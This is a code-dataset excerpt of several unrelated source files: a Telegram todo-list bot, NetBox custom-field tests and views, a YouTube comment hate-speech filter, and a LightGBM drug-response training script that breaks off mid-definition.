metadata
dict
text
stringlengths
60
3.49M
{ "source": "joshcoales/todolistbot", "score": 3 }
#### File: todolistbot/todo_list_bot/response.py ```python from typing import List, Optional, Dict from telethon import Button from telethon.tl.types import KeyboardButtonCallback class Response: per_page = 6 text_length_limit = 4096 def __init__(self, text: str, buttons: Optional[List[KeyboardButtonCallback]] = None): self._text = text self.all_buttons = buttons self.page = 1 def prefix(self, prefix: str) -> None: self._text = prefix + self._text @property def text(self) -> str: truncated = self._text[:self.text_length_limit - 4] if truncated != self._text: truncated += "\n..." return truncated @property def pages(self) -> Optional[int]: if self.all_buttons is None: return None return ((len(self.all_buttons) - 1) // self.per_page) + 1 @property def has_next(self) -> bool: if self.pages == 1 or self.all_buttons is None: return False return self.page < self.pages @property def has_prev(self) -> bool: if self.pages == 1 or self.all_buttons is None: return False return self.page > 1 def buttons(self) -> Optional[List[List[KeyboardButtonCallback]]]: if self.all_buttons is None: return None buttons = self.all_buttons[(self.page - 1) * self.per_page: self.page * self.per_page] if self.pages == 1: return [[b] for b in buttons] page_buttons = [ Button.inline( "< Prev" if self.has_prev else " ", f"page:{self.page - 1}" if self.has_prev else f"page:{self.page}" ), Button.inline( "> Next" if self.has_next else " ", f"page:{self.page + 1}" if self.has_next else f"page:{self.page}" ) ] return [ *([b] for b in buttons), page_buttons ] def to_json(self) -> Dict: return { "text": self.text, "all_buttons": [ { "text": button.text, "data": button.data.decode() } for button in self.all_buttons ] if self.all_buttons is not None else None, "page": self.page } @classmethod def from_json(cls, data: Dict) -> 'Response': response = Response( data["text"], [Button.inline(d["text"], d["data"]) for d in data["all_buttons"]] if data["all_buttons"] is not None else None ) response.page = data["page"] return response ``` #### File: todolistbot/todo_list_bot/todo_list.py ```python from abc import ABC, abstractmethod from enum import Enum from typing import List, Optional, Dict, Tuple from prometheus_client import Counter list_parsed = Counter("todolistbot_parse_list_total", "Number of todo lists parsed") sections_parsed = Counter("todolistbot_parse_section_total", "Number of todo list sections parsed") items_parsed = Counter("todolistbot_parse_items_total", "Number of todo list items parsed") def line_is_section(line: str) -> bool: return line.startswith("#") def line_is_empty(line: str) -> bool: return line.strip() == "" def line_is_item(line: str) -> bool: return not line_is_empty(line) and not line_is_section(line) # noinspection PyMethodMayBeStatic class TodoList: def __init__(self, path: str): self.path = path self.root_section = TodoSection("root", 0, None) def parse(self) -> None: list_parsed.inc() with open(self.path, "r") as f: contents = f.readlines() self.parse_lines(contents) def parse_lines(self, contents: List[str], current_section: Optional['TodoSection'] = None): current_section = current_section or self.root_section current_item = None for line in contents: if line_is_empty(line): continue if line_is_section(line): current_section = self.parse_section(line, current_section) current_item = None else: current_item = self.parse_item(line, current_section, current_item) def parse_section(self, line: str, current_section: 'TodoSection') -> 'TodoSection': sections_parsed.inc() section_title = line.lstrip("#") section_depth = len(line) - len(section_title) section_title = section_title.strip() if section_depth > current_section.depth: parent_section = current_section else: while section_depth <= current_section.depth: current_section = current_section.parent_section parent_section = current_section return TodoSection(section_title, section_depth, parent_section) def parse_item(self, line: str, current_section: 'TodoSection', current_item: Optional['TodoItem']) -> 'TodoItem': items_parsed.inc() status, line = self.parse_status(line) item_text = line.lstrip(" -") item_depth = len(line) - len(item_text) item_text = item_text.strip() if current_item is None: parent_item = None elif item_depth > current_item.depth: parent_item = current_item else: parent_item = current_item while item_depth <= parent_item.depth: if parent_item.parent_item is not None: parent_item = parent_item.parent_item else: parent_item = None break return TodoItem(status, item_text, item_depth, current_section, parent_item) def parse_status(self, line: str) -> Tuple['TodoStatus', str]: status = TodoStatus.TODO for enum_status in TodoStatus: if line.startswith(enum_status.value): status = enum_status line = line[len(enum_status.value):] break return status, line def to_text(self, section: Optional['TodoSection'] = None) -> str: section = section or self.root_section max_length = 4096 text = section.to_text() if len(text) < max_length: return text max_depth = 10 while len(section.to_text(max_depth)) > max_length and max_depth >= 1: max_depth -= 1 return section.to_text(max_depth) def save(self) -> None: with open(self.path, "w") as f: f.write(self.root_section.to_text()) def to_json(self) -> Dict: return { "path": self.path } @classmethod def from_json(cls, data: Dict) -> 'TodoList': todo = TodoList(data["path"]) todo.parse() return todo class TodoContainer(ABC): def __init__(self, parent_section: Optional['TodoSection']): self.parent_section: Optional[TodoSection] = parent_section @property @abstractmethod def parent(self) -> Optional['TodoContainer']: raise NotImplementedError @abstractmethod def remove(self) -> None: raise NotImplementedError @abstractmethod def is_empty(self) -> bool: raise NotImplementedError @abstractmethod def to_text(self, max_depth: Optional[int] = None) -> str: raise NotImplementedError class TodoSection(TodoContainer): def __init__(self, title: str, depth: int, parent: Optional['TodoSection']): super().__init__(parent) self.title: str = title self.depth: int = depth self.sub_sections: List['TodoSection'] = [] if parent: parent.sub_sections.append(self) self.root_items: List['TodoItem'] = [] @property def parent(self) -> Optional['TodoSection']: return self.parent_section def is_empty(self) -> bool: return not self.sub_sections and not self.root_items def remove(self) -> None: if self.parent_section: self.parent_section.sub_sections.remove(self) def to_text(self, max_depth: Optional[int] = None) -> str: lines = [] if self.depth != 0: lines += ["#" * self.depth + " " + self.title] if max_depth is None: lines += [item.to_text(max_depth) for item in self.root_items] if max_depth is None or self.depth < max_depth: lines += [("\n" if max_depth is None else "") + section.to_text(max_depth) for section in self.sub_sections] return "\n".join(lines) class TodoItem(TodoContainer): def __init__( self, status: 'TodoStatus', name: str, depth: int, parent_section: TodoSection, parent_item: Optional['TodoItem'] ): super().__init__(parent_section) self.status: 'TodoStatus' = status self.name: str = name self.depth: int = depth self.parent_item: Optional['TodoItem'] = parent_item self.sub_items: List['TodoItem'] = [] if parent_item: parent_item.sub_items.append(self) else: parent_section.root_items.append(self) @property def parent(self) -> TodoContainer: if self.parent_item: return self.parent_item return self.parent_section def is_empty(self) -> bool: return not self.sub_items def remove(self) -> None: if self.parent_item: self.parent_item.sub_items.remove(self) else: self.parent_section.root_items.remove(self) def to_text(self, max_depth: Optional[int] = None) -> str: lines = [self.status.value + ("- " * self.depth)[:self.depth] + self.name] if not max_depth or (self.parent_item.depth + self.depth) < max_depth: lines += [item.to_text(max_depth) for item in self.sub_items] return "\n".join(lines) class TodoStatus(Enum): COMPLETE = "DONE" IN_PROGRESS = "INP" TODO = "" ```
{ "source": "joshcorr/netbox", "score": 2 }
#### File: extras/tests/test_customfields.py ```python from datetime import date from django.contrib.contenttypes.models import ContentType from django.test import TestCase from django.urls import reverse from rest_framework import status from dcim.models import Site from extras.constants import CF_TYPE_TEXT, CF_TYPE_INTEGER, CF_TYPE_BOOLEAN, CF_TYPE_DATE, CF_TYPE_SELECT, CF_TYPE_URL, CF_TYPE_SELECT from extras.models import CustomField, CustomFieldValue, CustomFieldChoice from utilities.testing import APITestCase from virtualization.models import VirtualMachine class CustomFieldTest(TestCase): def setUp(self): Site.objects.bulk_create([ Site(name='Site A', slug='site-a'), Site(name='Site B', slug='site-b'), Site(name='Site C', slug='site-c'), ]) def test_simple_fields(self): DATA = ( {'field_type': CF_TYPE_TEXT, 'field_value': 'Foobar!', 'empty_value': ''}, {'field_type': CF_TYPE_INTEGER, 'field_value': 0, 'empty_value': None}, {'field_type': CF_TYPE_INTEGER, 'field_value': 42, 'empty_value': None}, {'field_type': CF_TYPE_BOOLEAN, 'field_value': True, 'empty_value': None}, {'field_type': CF_TYPE_BOOLEAN, 'field_value': False, 'empty_value': None}, {'field_type': CF_TYPE_DATE, 'field_value': date(2016, 6, 23), 'empty_value': None}, {'field_type': CF_TYPE_URL, 'field_value': 'http://example.com/', 'empty_value': ''}, ) obj_type = ContentType.objects.get_for_model(Site) for data in DATA: # Create a custom field cf = CustomField(type=data['field_type'], name='my_field', required=False) cf.save() cf.obj_type.set([obj_type]) cf.save() # Assign a value to the first Site site = Site.objects.first() cfv = CustomFieldValue(field=cf, obj_type=obj_type, obj_id=site.id) cfv.value = data['field_value'] cfv.save() # Retrieve the stored value cfv = CustomFieldValue.objects.filter(obj_type=obj_type, obj_id=site.pk).first() self.assertEqual(cfv.value, data['field_value']) # Delete the stored value cfv.value = data['empty_value'] cfv.save() self.assertEqual(CustomFieldValue.objects.filter(obj_type=obj_type, obj_id=site.pk).count(), 0) # Delete the custom field cf.delete() def test_select_field(self): obj_type = ContentType.objects.get_for_model(Site) # Create a custom field cf = CustomField(type=CF_TYPE_SELECT, name='my_field', required=False) cf.save() cf.obj_type.set([obj_type]) cf.save() # Create some choices for the field CustomFieldChoice.objects.bulk_create([ CustomFieldChoice(field=cf, value='Option A'), CustomFieldChoice(field=cf, value='Option B'), CustomFieldChoice(field=cf, value='Option C'), ]) # Assign a value to the first Site site = Site.objects.first() cfv = CustomFieldValue(field=cf, obj_type=obj_type, obj_id=site.id) cfv.value = cf.choices.first() cfv.save() # Retrieve the stored value cfv = CustomFieldValue.objects.filter(obj_type=obj_type, obj_id=site.pk).first() self.assertEqual(str(cfv.value), 'Option A') # Delete the stored value cfv.value = None cfv.save() self.assertEqual(CustomFieldValue.objects.filter(obj_type=obj_type, obj_id=site.pk).count(), 0) # Delete the custom field cf.delete() class CustomFieldAPITest(APITestCase): def setUp(self): super().setUp() content_type = ContentType.objects.get_for_model(Site) # Text custom field self.cf_text = CustomField(type=CF_TYPE_TEXT, name='magic_word') self.cf_text.save() self.cf_text.obj_type.set([content_type]) self.cf_text.save() # Integer custom field self.cf_integer = CustomField(type=CF_TYPE_INTEGER, name='magic_number') self.cf_integer.save() self.cf_integer.obj_type.set([content_type]) self.cf_integer.save() # Boolean custom field self.cf_boolean = CustomField(type=CF_TYPE_BOOLEAN, name='is_magic') self.cf_boolean.save() self.cf_boolean.obj_type.set([content_type]) self.cf_boolean.save() # Date custom field self.cf_date = CustomField(type=CF_TYPE_DATE, name='magic_date') self.cf_date.save() self.cf_date.obj_type.set([content_type]) self.cf_date.save() # URL custom field self.cf_url = CustomField(type=CF_TYPE_URL, name='magic_url') self.cf_url.save() self.cf_url.obj_type.set([content_type]) self.cf_url.save() # Select custom field self.cf_select = CustomField(type=CF_TYPE_SELECT, name='magic_choice') self.cf_select.save() self.cf_select.obj_type.set([content_type]) self.cf_select.save() self.cf_select_choice1 = CustomFieldChoice(field=self.cf_select, value='Foo') self.cf_select_choice1.save() self.cf_select_choice2 = CustomFieldChoice(field=self.cf_select, value='Bar') self.cf_select_choice2.save() self.cf_select_choice3 = CustomFieldChoice(field=self.cf_select, value='Baz') self.cf_select_choice3.save() self.site = Site.objects.create(name='Test Site 1', slug='test-site-1') def test_get_obj_without_custom_fields(self): url = reverse('dcim-api:site-detail', kwargs={'pk': self.site.pk}) response = self.client.get(url, **self.header) self.assertEqual(response.data['name'], self.site.name) self.assertEqual(response.data['custom_fields'], { 'magic_word': None, 'magic_number': None, 'is_magic': None, 'magic_date': None, 'magic_url': None, 'magic_choice': None, }) def test_get_obj_with_custom_fields(self): CUSTOM_FIELD_VALUES = [ (self.cf_text, 'Test string'), (self.cf_integer, 1234), (self.cf_boolean, True), (self.cf_date, date(2016, 6, 23)), (self.cf_url, 'http://example.com/'), (self.cf_select, self.cf_select_choice1.pk), ] for field, value in CUSTOM_FIELD_VALUES: cfv = CustomFieldValue(field=field, obj=self.site) cfv.value = value cfv.save() url = reverse('dcim-api:site-detail', kwargs={'pk': self.site.pk}) response = self.client.get(url, **self.header) self.assertEqual(response.data['name'], self.site.name) self.assertEqual(response.data['custom_fields'].get('magic_word'), CUSTOM_FIELD_VALUES[0][1]) self.assertEqual(response.data['custom_fields'].get('magic_number'), CUSTOM_FIELD_VALUES[1][1]) self.assertEqual(response.data['custom_fields'].get('is_magic'), CUSTOM_FIELD_VALUES[2][1]) self.assertEqual(response.data['custom_fields'].get('magic_date'), CUSTOM_FIELD_VALUES[3][1]) self.assertEqual(response.data['custom_fields'].get('magic_url'), CUSTOM_FIELD_VALUES[4][1]) self.assertEqual(response.data['custom_fields'].get('magic_choice'), { 'value': self.cf_select_choice1.pk, 'label': 'Foo' }) def test_set_custom_field_text(self): data = { 'name': 'Test Site 1', 'slug': 'test-site-1', 'custom_fields': { 'magic_word': 'Foo bar baz', } } url = reverse('dcim-api:site-detail', kwargs={'pk': self.site.pk}) response = self.client.put(url, data, format='json', **self.header) self.assertHttpStatus(response, status.HTTP_200_OK) self.assertEqual(response.data['custom_fields'].get('magic_word'), data['custom_fields']['magic_word']) cfv = self.site.custom_field_values.get(field=self.cf_text) self.assertEqual(cfv.value, data['custom_fields']['magic_word']) def test_set_custom_field_integer(self): data = { 'name': 'Test Site 1', 'slug': 'test-site-1', 'custom_fields': { 'magic_number': 42, } } url = reverse('dcim-api:site-detail', kwargs={'pk': self.site.pk}) response = self.client.put(url, data, format='json', **self.header) self.assertHttpStatus(response, status.HTTP_200_OK) self.assertEqual(response.data['custom_fields'].get('magic_number'), data['custom_fields']['magic_number']) cfv = self.site.custom_field_values.get(field=self.cf_integer) self.assertEqual(cfv.value, data['custom_fields']['magic_number']) def test_set_custom_field_boolean(self): data = { 'name': 'Test Site 1', 'slug': 'test-site-1', 'custom_fields': { 'is_magic': 0, } } url = reverse('dcim-api:site-detail', kwargs={'pk': self.site.pk}) response = self.client.put(url, data, format='json', **self.header) self.assertHttpStatus(response, status.HTTP_200_OK) self.assertEqual(response.data['custom_fields'].get('is_magic'), data['custom_fields']['is_magic']) cfv = self.site.custom_field_values.get(field=self.cf_boolean) self.assertEqual(cfv.value, data['custom_fields']['is_magic']) def test_set_custom_field_date(self): data = { 'name': 'Test Site 1', 'slug': 'test-site-1', 'custom_fields': { 'magic_date': '2017-04-25', } } url = reverse('dcim-api:site-detail', kwargs={'pk': self.site.pk}) response = self.client.put(url, data, format='json', **self.header) self.assertHttpStatus(response, status.HTTP_200_OK) self.assertEqual(response.data['custom_fields'].get('magic_date'), data['custom_fields']['magic_date']) cfv = self.site.custom_field_values.get(field=self.cf_date) self.assertEqual(cfv.value.isoformat(), data['custom_fields']['magic_date']) def test_set_custom_field_url(self): data = { 'name': 'Test Site 1', 'slug': 'test-site-1', 'custom_fields': { 'magic_url': 'http://example.com/2/', } } url = reverse('dcim-api:site-detail', kwargs={'pk': self.site.pk}) response = self.client.put(url, data, format='json', **self.header) self.assertHttpStatus(response, status.HTTP_200_OK) self.assertEqual(response.data['custom_fields'].get('magic_url'), data['custom_fields']['magic_url']) cfv = self.site.custom_field_values.get(field=self.cf_url) self.assertEqual(cfv.value, data['custom_fields']['magic_url']) def test_set_custom_field_select(self): data = { 'name': 'Test Site 1', 'slug': 'test-site-1', 'custom_fields': { 'magic_choice': self.cf_select_choice2.pk, } } url = reverse('dcim-api:site-detail', kwargs={'pk': self.site.pk}) response = self.client.put(url, data, format='json', **self.header) self.assertHttpStatus(response, status.HTTP_200_OK) self.assertEqual(response.data['custom_fields'].get('magic_choice'), data['custom_fields']['magic_choice']) cfv = self.site.custom_field_values.get(field=self.cf_select) self.assertEqual(cfv.value.pk, data['custom_fields']['magic_choice']) def test_set_custom_field_defaults(self): """ Create a new object with no custom field data. Custom field values should be created using the custom fields' default values. """ CUSTOM_FIELD_DEFAULTS = { 'magic_word': 'foobar', 'magic_number': '123', 'is_magic': 'true', 'magic_date': '2019-12-13', 'magic_url': 'http://example.com/', 'magic_choice': self.cf_select_choice1.value, } # Update CustomFields to set default values for field_name, default_value in CUSTOM_FIELD_DEFAULTS.items(): CustomField.objects.filter(name=field_name).update(default=default_value) data = { 'name': 'Test Site X', 'slug': 'test-site-x', } url = reverse('dcim-api:site-list') response = self.client.post(url, data, format='json', **self.header) self.assertHttpStatus(response, status.HTTP_201_CREATED) self.assertEqual(response.data['custom_fields']['magic_word'], CUSTOM_FIELD_DEFAULTS['magic_word']) self.assertEqual(response.data['custom_fields']['magic_number'], str(CUSTOM_FIELD_DEFAULTS['magic_number'])) self.assertEqual(response.data['custom_fields']['is_magic'], bool(CUSTOM_FIELD_DEFAULTS['is_magic'])) self.assertEqual(response.data['custom_fields']['magic_date'], CUSTOM_FIELD_DEFAULTS['magic_date']) self.assertEqual(response.data['custom_fields']['magic_url'], CUSTOM_FIELD_DEFAULTS['magic_url']) self.assertEqual(response.data['custom_fields']['magic_choice'], self.cf_select_choice1.pk) class CustomFieldChoiceAPITest(APITestCase): def setUp(self): super().setUp() vm_content_type = ContentType.objects.get_for_model(VirtualMachine) self.cf_1 = CustomField.objects.create(name="cf_1", type=CF_TYPE_SELECT) self.cf_2 = CustomField.objects.create(name="cf_2", type=CF_TYPE_SELECT) self.cf_choice_1 = CustomFieldChoice.objects.create(field=self.cf_1, value="cf_field_1", weight=100) self.cf_choice_2 = CustomFieldChoice.objects.create(field=self.cf_1, value="cf_field_2", weight=50) self.cf_choice_3 = CustomFieldChoice.objects.create(field=self.cf_2, value="cf_field_3", weight=10) def test_list_cfc(self): url = reverse('extras-api:custom-field-choice-list') response = self.client.get(url, **self.header) self.assertEqual(len(response.data), 2) self.assertEqual(len(response.data[self.cf_1.name]), 2) self.assertEqual(len(response.data[self.cf_2.name]), 1) self.assertTrue(self.cf_choice_1.value in response.data[self.cf_1.name]) self.assertTrue(self.cf_choice_2.value in response.data[self.cf_1.name]) self.assertTrue(self.cf_choice_3.value in response.data[self.cf_2.name]) self.assertEqual(self.cf_choice_1.pk, response.data[self.cf_1.name][self.cf_choice_1.value]) self.assertEqual(self.cf_choice_2.pk, response.data[self.cf_1.name][self.cf_choice_2.value]) self.assertEqual(self.cf_choice_3.pk, response.data[self.cf_2.name][self.cf_choice_3.value]) ``` #### File: netbox/extras/views.py ```python from django import template from django.conf import settings from django.contrib import messages from django.contrib.auth.mixins import PermissionRequiredMixin from django.contrib.contenttypes.models import ContentType from django.db.models import Count, Q from django.http import Http404, HttpResponseForbidden from django.shortcuts import get_object_or_404, redirect, render from django.utils.safestring import mark_safe from django.views.generic import View from django_tables2 import RequestConfig from utilities.forms import ConfirmationForm from utilities.paginator import EnhancedPaginator from utilities.views import BulkDeleteView, BulkEditView, ObjectDeleteView, ObjectEditView, ObjectListView from . import filters, forms from .models import ConfigContext, ImageAttachment, ObjectChange, ReportResult, Tag, TaggedItem from .reports import get_report, get_reports from .scripts import get_scripts, run_script from .tables import ConfigContextTable, ObjectChangeTable, TagTable, TaggedItemTable # # Tags # class TagListView(PermissionRequiredMixin, ObjectListView): permission_required = 'extras.view_tag' queryset = Tag.objects.annotate( items=Count('extras_taggeditem_items', distinct=True) ).order_by( 'name' ) filter = filters.TagFilter filter_form = forms.TagFilterForm table = TagTable template_name = 'extras/tag_list.html' class TagView(View): def get(self, request, slug): tag = get_object_or_404(Tag, slug=slug) tagged_items = TaggedItem.objects.filter( tag=tag ).prefetch_related( 'content_type', 'content_object' ) # Generate a table of all items tagged with this Tag items_table = TaggedItemTable(tagged_items) paginate = { 'paginator_class': EnhancedPaginator, 'per_page': request.GET.get('per_page', settings.PAGINATE_COUNT) } RequestConfig(request, paginate).configure(items_table) return render(request, 'extras/tag.html', { 'tag': tag, 'items_count': tagged_items.count(), 'items_table': items_table, }) class TagEditView(PermissionRequiredMixin, ObjectEditView): permission_required = 'extras.change_tag' model = Tag model_form = forms.TagForm default_return_url = 'extras:tag_list' template_name = 'extras/tag_edit.html' class TagDeleteView(PermissionRequiredMixin, ObjectDeleteView): permission_required = 'extras.delete_tag' model = Tag default_return_url = 'extras:tag_list' class TagBulkEditView(PermissionRequiredMixin, BulkEditView): permission_required = 'extras.change_tag' queryset = Tag.objects.annotate( items=Count('extras_taggeditem_items', distinct=True) ).order_by( 'name' ) # filter = filters.ProviderFilter table = TagTable form = forms.TagBulkEditForm default_return_url = 'circuits:provider_list' class TagBulkDeleteView(PermissionRequiredMixin, BulkDeleteView): permission_required = 'extras.delete_tag' queryset = Tag.objects.annotate( items=Count('extras_taggeditem_items') ).order_by( 'name' ) table = TagTable default_return_url = 'extras:tag_list' # # Config contexts # class ConfigContextListView(PermissionRequiredMixin, ObjectListView): permission_required = 'extras.view_configcontext' queryset = ConfigContext.objects.all() filter = filters.ConfigContextFilter filter_form = forms.ConfigContextFilterForm table = ConfigContextTable template_name = 'extras/configcontext_list.html' class ConfigContextView(PermissionRequiredMixin, View): permission_required = 'extras.view_configcontext' def get(self, request, pk): configcontext = get_object_or_404(ConfigContext, pk=pk) return render(request, 'extras/configcontext.html', { 'configcontext': configcontext, }) class ConfigContextCreateView(PermissionRequiredMixin, ObjectEditView): permission_required = 'extras.add_configcontext' model = ConfigContext model_form = forms.ConfigContextForm default_return_url = 'extras:configcontext_list' template_name = 'extras/configcontext_edit.html' class ConfigContextEditView(ConfigContextCreateView): permission_required = 'extras.change_configcontext' class ConfigContextBulkEditView(PermissionRequiredMixin, BulkEditView): permission_required = 'extras.change_configcontext' queryset = ConfigContext.objects.all() filter = filters.ConfigContextFilter table = ConfigContextTable form = forms.ConfigContextBulkEditForm default_return_url = 'extras:configcontext_list' class ConfigContextDeleteView(PermissionRequiredMixin, ObjectDeleteView): permission_required = 'extras.delete_configcontext' model = ConfigContext default_return_url = 'extras:configcontext_list' class ConfigContextBulkDeleteView(PermissionRequiredMixin, BulkDeleteView): permission_required = 'extras.delete_configcontext' queryset = ConfigContext.objects.all() table = ConfigContextTable default_return_url = 'extras:configcontext_list' class ObjectConfigContextView(View): object_class = None base_template = None def get(self, request, pk): obj = get_object_or_404(self.object_class, pk=pk) source_contexts = ConfigContext.objects.get_for_object(obj) model_name = self.object_class._meta.model_name return render(request, 'extras/object_configcontext.html', { model_name: obj, 'obj': obj, 'rendered_context': obj.get_config_context(), 'source_contexts': source_contexts, 'base_template': self.base_template, 'active_tab': 'config-context', }) # # Change logging # class ObjectChangeListView(PermissionRequiredMixin, ObjectListView): permission_required = 'extras.view_objectchange' queryset = ObjectChange.objects.prefetch_related('user', 'changed_object_type') filter = filters.ObjectChangeFilter filter_form = forms.ObjectChangeFilterForm table = ObjectChangeTable template_name = 'extras/objectchange_list.html' class ObjectChangeView(PermissionRequiredMixin, View): permission_required = 'extras.view_objectchange' def get(self, request, pk): objectchange = get_object_or_404(ObjectChange, pk=pk) related_changes = ObjectChange.objects.filter(request_id=objectchange.request_id).exclude(pk=objectchange.pk) related_changes_table = ObjectChangeTable( data=related_changes[:50], orderable=False ) return render(request, 'extras/objectchange.html', { 'objectchange': objectchange, 'related_changes_table': related_changes_table, 'related_changes_count': related_changes.count() }) class ObjectChangeLogView(View): """ Present a history of changes made to a particular object. """ def get(self, request, model, **kwargs): # Get object my model and kwargs (e.g. slug='foo') obj = get_object_or_404(model, **kwargs) # Gather all changes for this object (and its related objects) content_type = ContentType.objects.get_for_model(model) objectchanges = ObjectChange.objects.prefetch_related( 'user', 'changed_object_type' ).filter( Q(changed_object_type=content_type, changed_object_id=obj.pk) | Q(related_object_type=content_type, related_object_id=obj.pk) ) objectchanges_table = ObjectChangeTable( data=objectchanges, orderable=False ) # Apply the request context paginate = { 'paginator_class': EnhancedPaginator, 'per_page': request.GET.get('per_page', settings.PAGINATE_COUNT) } RequestConfig(request, paginate).configure(objectchanges_table) # Check whether a header template exists for this model base_template = '{}/{}.html'.format(model._meta.app_label, model._meta.model_name) try: template.loader.get_template(base_template) object_var = model._meta.model_name except template.TemplateDoesNotExist: base_template = '_base.html' object_var = 'obj' return render(request, 'extras/object_changelog.html', { object_var: obj, 'table': objectchanges_table, 'base_template': base_template, 'active_tab': 'changelog', }) # # Image attachments # class ImageAttachmentEditView(PermissionRequiredMixin, ObjectEditView): permission_required = 'extras.change_imageattachment' model = ImageAttachment model_form = forms.ImageAttachmentForm def alter_obj(self, imageattachment, request, args, kwargs): if not imageattachment.pk: # Assign the parent object based on URL kwargs model = kwargs.get('model') imageattachment.parent = get_object_or_404(model, pk=kwargs['object_id']) return imageattachment def get_return_url(self, request, imageattachment): return imageattachment.parent.get_absolute_url() class ImageAttachmentDeleteView(PermissionRequiredMixin, ObjectDeleteView): permission_required = 'extras.delete_imageattachment' model = ImageAttachment def get_return_url(self, request, imageattachment): return imageattachment.parent.get_absolute_url() # # Reports # class ReportListView(PermissionRequiredMixin, View): """ Retrieve all of the available reports from disk and the recorded ReportResult (if any) for each. """ permission_required = 'extras.view_reportresult' def get(self, request): reports = get_reports() results = {r.report: r for r in ReportResult.objects.all()} ret = [] for module, report_list in reports: module_reports = [] for report in report_list: report.result = results.get(report.full_name, None) module_reports.append(report) ret.append((module, module_reports)) return render(request, 'extras/report_list.html', { 'reports': ret, }) class ReportView(PermissionRequiredMixin, View): """ Display a single Report and its associated ReportResult (if any). """ permission_required = 'extras.view_reportresult' def get(self, request, name): # Retrieve the Report by "<module>.<report>" module_name, report_name = name.split('.') report = get_report(module_name, report_name) if report is None: raise Http404 # Attach the ReportResult (if any) report.result = ReportResult.objects.filter(report=report.full_name).first() return render(request, 'extras/report.html', { 'report': report, 'run_form': ConfirmationForm(), }) class ReportRunView(PermissionRequiredMixin, View): """ Run a Report and record a new ReportResult. """ permission_required = 'extras.add_reportresult' def post(self, request, name): # Retrieve the Report by "<module>.<report>" module_name, report_name = name.split('.') report = get_report(module_name, report_name) if report is None: raise Http404 form = ConfirmationForm(request.POST) if form.is_valid(): # Run the Report. A new ReportResult is created. report.run() result = 'failed' if report.failed else 'passed' msg = "Ran report {} ({})".format(report.full_name, result) messages.success(request, mark_safe(msg)) return redirect('extras:report', name=report.full_name) # # Scripts # class ScriptListView(PermissionRequiredMixin, View): permission_required = 'extras.view_script' def get(self, request): return render(request, 'extras/script_list.html', { 'scripts': get_scripts(), }) class ScriptView(PermissionRequiredMixin, View): permission_required = 'extras.view_script' def _get_script(self, module, name): scripts = get_scripts() try: return scripts[module][name]() except KeyError: raise Http404 def get(self, request, module, name): script = self._get_script(module, name) form = script.as_form(initial=request.GET) return render(request, 'extras/script.html', { 'module': module, 'script': script, 'form': form, }) def post(self, request, module, name): # Permissions check if not request.user.has_perm('extras.run_script'): return HttpResponseForbidden() script = self._get_script(module, name) form = script.as_form(request.POST, request.FILES) output = None execution_time = None if form.is_valid(): commit = form.cleaned_data.pop('_commit') output, execution_time = run_script(script, form.cleaned_data, request, commit) return render(request, 'extras/script.html', { 'module': module, 'script': script, 'form': form, 'output': output, 'execution_time': execution_time, }) ```
{ "source": "joshcruz428/Deep-YouTube-Comment-Text-Generator", "score": 3 }
#### File: joshcruz428/Deep-YouTube-Comment-Text-Generator/commentRefiner.py ```python import json_lines import os from hatesonar import Sonar #Only includes the comments in a txt file, given that the comment has over a certain number of votes #This also attempts to use Sonar to filter out hate speech def refine_jsonl_file(path, votes_threshold=10, hate_limit=0.4, offensive_limit=0.7, general_limit=0.8): sonar = Sonar() name, _ = os.path.splitext(path) refined_name = "refined_{name}.txt".format(name = name) if os.path.exists(refined_name): os.remove(refined_name) refined_file = open(refined_name, mode='w') with open(path, 'rb') as f: # opening file in binary(rb) mode with refined_file as rf: for item in json_lines.reader(f): if int(item['votes']) > 0: text = item['text'] hate_confidence = sonar.ping(text=text)['classes'][0]['confidence'] offensive_confidence = sonar.ping(text=text)['classes'][1]['confidence'] if not((hate_confidence > hate_limit) or (offensive_confidence > offensive_limit) or (hate_confidence + offensive_confidence > general_limit)): try: print(text, file=rf) except: continue rf.close() f.close() ```
{ "source": "JoshCullinan/CCLDP", "score": 3 }
#### File: JoshCullinan/CCLDP/Code_submission.py ```python import numpy as np import pandas as pd import math import re import time import gc import matplotlib.pyplot as plt import seaborn as sns def Model_Explore(trial_reg): #Collect the feature importance, sort feature importance and the select the top 2-22 features features = pd.DataFrame(index = trial_reg.feature_name(), data = trial_reg.feature_importance(importance_type='split'), columns = ['Feature_Weight']) features.sort_values(by = 'Feature_Weight', ascending = False, inplace=True) top100 = features.iloc(axis=0)[2:22] #Create df for feature importance top100.reset_index(inplace = True) top100.columns = ['Feature', 'Feature Weight'] #Create seaborn plot sns.set_style("whitegrid") sns.set_context("paper") plot = sns.barplot(x="Feature Weight", y="Feature", palette = "mako", data=top100.sort_values(by="Feature Weight", ascending=False)) return plot if __name__ == '__main__': #Create relative path names import os dirname = os.path.dirname(__file__) #Neptune.ai for monitoring import neptune neptune.init(project_qualified_name='clljos001/CCLDP', api_token='<KEY> ''' This Code is usually used to import the omics datasets, feature engineer, and feature select. It has been commented out for brevity, and speed up this training script. Typically if the X & y set already exists it won't run. ''' #Load in data, perform basic data manipulation, feature selection and removal of erroneous data. #import Ingest #files_to_imp = 'E' #features_to_imp = 500 #X, y = Ingest.Ingest(files_to_imp, features_to_imp) #Load in data X = pd.read_csv(os.path.join(dirname,'X')) y = pd.read_csv(os.path.join(dirname, 'y')) X.drop(columns='Unnamed: 0', inplace = True) y.drop(columns='Unnamed: 0', inplace = True) X.loc(axis=1)['PUTATIVE_TARGET'] = X.loc(axis=1)['PUTATIVE_TARGET'].astype('category') X.loc(axis=1)['DRUG_NAME'] = X.loc(axis=1)['DRUG_NAME'].astype('category') #Create a test, validation and train set print("\nCreating test, train, and validation datasets") from sklearn.model_selection import train_test_split X_train, X_test, y_train, y_test = train_test_split(X, y, random_state = 12345, test_size=0.1, shuffle = True, stratify = X.loc(axis=1)['DRUG_NAME']) X_train, X_val, y_train, y_val = train_test_split(X_train, y_train, random_state = 12345, test_size=0.11, shuffle = True, stratify = X_train.loc(axis=1)['DRUG_NAME']) #LGB datasets are used for model training. import lightgbm as lgb train = lgb.Dataset(X_train, label = y_train, free_raw_data = False, categorical_feature=['DRUG_NAME', 'PUTATIVE_TARGET']) test = lgb.Dataset(X_test, label = y_test, free_raw_data = False, categorical_feature=['DRUG_NAME', 'PUTATIVE_TARGET']) val = lgb.Dataset(X_val, label = y_val, free_raw_data = False, categorical_feature=['DRUG_NAME', 'PUTATIVE_TARGET']) print("Complete") #Delete X and y to free up memory. This step isn't done in the code to cross validate. #del X, y #take out the trash to free up memory gc.collect() #### Train a single LightGBM Model#### from sklearn.metrics import mean_squared_error as mse from sklearn.metrics import r2_score #This dictionary is the parameter list for the model we will be training. p = { 